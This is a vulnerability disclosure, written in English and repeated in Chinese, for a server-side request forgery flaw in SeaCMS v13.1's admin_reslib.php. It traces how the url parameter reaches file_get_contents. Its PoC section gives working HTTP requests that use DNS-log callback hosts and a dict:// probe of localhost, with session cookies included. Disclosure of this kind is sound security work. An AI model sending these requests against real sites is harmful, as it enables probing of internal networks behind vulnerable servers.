seacms-net
SeaCMS v13.1 SSRF vulnerability
Summary
SeaCMS v13.1 contains an SSRF vulnerability in the "admin\admin_reslib.php" file. After gaining backend access, an attacker can exploit this vulnerability to trigger a Server-Side Request Forgery (SSRF).
Detail
admin_reslib.php
The cget function located on lines 75 and 77 is the entry point for the vulnerability. The first request carries the weburl parameter and isref, while the second request carries weburl and 0.
The
isref variable is assigned the value 1 on line 38.
filter.inc.php
I discovered the following inclusion chain:
admin_reslib.php -> config.php -> common.php -> filter.inc.php
In lines 37-44 of filter.inc.php, I observed that the HTTP request parameters are assigned to variables with the same name, allowing the URL to be controlled via HTTP request.
The $url variable is assigned to $var_url, which in turn is assigned to $weburl, meaning the weburl parameter in cget can be controlled by the user.
common.file.func.php
Next, let's look at include\common.file.func.php, where the cget function is defined:
As mentioned earlier, two cget calls are made. The first sets $isref = 1, and the second sets $isref = 2. As a result, both getRemoteContent and get are executed.
From these functions, we can see that the $url parameter is passed to file_get_contents for execution, making the file_get_contents function the Sink for this vulnerability.
PoC
This vulnerability requires backend administrator privileges and the administrator's cookies to initiate the request.
Please note that the backend path is randomly generated during website setup, so each user will have a different path. During testing, use your specific path.
DNS Log
http://localdomain/dv87zx/admin_reslib.php?ac=list&rid=1&url=dict://12.64ju5d.dnslog.cn
GET /9d74yp/admin_reslib.php?ac=list&rid=1&url=http://test.cymyolkmms.yutu.eu.org HTTP/1.1
Host: localdomain
Cookie: t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MTA6InBocCB8IHBocD8iO3M6MzoiYWxsIjtpOjA7czozOiJodGEiO2k6MTt9; PHPSESSID=8aeha7cifr5gr58fcnvhr5ln10
127.0.0.1
GET /9d74yp/admin_reslib.php?ac=list&rid=1&url=dict://127.0.0.1:8888 HTTP/1.1
Host: localdomain
Cookie: t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MTA6InBocCB8IHBocD8iO3M6MzoiYWxsIjtpOjA7czozOiJodGEiO2k6MTt9; PHPSESSID=8aeha7cifr5gr58fcnvhr5ln10
The dict protocol can be used to access internal network addresses.
Summary
SeaCMS v13.1 在 "admin\admin_reslib.php" 文件中存在SSRF漏洞,攻击者进入后台后可以利用该漏洞触发Server-Side Request Forgery。
Detail
admin_reslib.php
第75和第77行的cget函数为漏洞的入口点,第一次请求携带了weburl参数和isref,第二次请求携带了weburl参数和0。
isref在第38行被赋予了1
filter.inc.php
我发现了如下包含关系
admin_reslib.php->config.php->common.php->filter.inc.php
在filter.inc.php37~44行中,可以看到HTTP请求的参数被赋给了同名变量,这得以使用HTTP请求来给url赋值。而$url=>$var_url=>$weburl,所以cget的weburl可以被用户控制它的值。
common.file.func.php
接下来看include\common.file.func.php,函数cget的定义在这个文件中:
由于前面所说的,执行了两次cget,第一次
$isref=1,第二次$isref=2,所以getRemoteContent和get都被执行了一次。
从这两个函数可以看到,传入的
$url参数都被作为file_get_contents执行了,所以,file_get_contents函数就是本漏洞的Sink点。
Poc
此漏洞需要后台管理员权限,需要携带管理员的Cookie才能发起请求。
请注意,后端路径是在设置网站时随机生成的,因此每个用户都有所不同。在测试期间使用您的特定路径。
dnslog
http://localdomain/dv87zx/admin_reslib.php?ac=list&rid=1&url=dict://12.64ju5d.dnslog.cn
GET /9d74yp/admin_reslib.php?ac=list&rid=1&url=http://test.cymyolkmms.yutu.eu.org HTTP/1.1
Host: localdomain
Cookie: t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MTA6InBocCB8IHBocD8iO3M6MzoiYWxsIjtpOjA7czozOiJodGEiO2k6MTt9; PHPSESSID=8aeha7cifr5gr58fcnvhr5ln10
127.0.0.1
GET /9d74yp/admin_reslib.php?ac=list&rid=1&url=dict://127.0.0.1:8888 HTTP/1.1
Host: localdomain
Cookie: t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MTA6InBocCB8IHBocD8iO3M6MzoiYWxsIjtpOjA7czozOiJodGEiO2k6MTt9; PHPSESSID=8aeha7cifr5gr58fcnvhr5ln10
可以使用dict协议,可以访问内网地址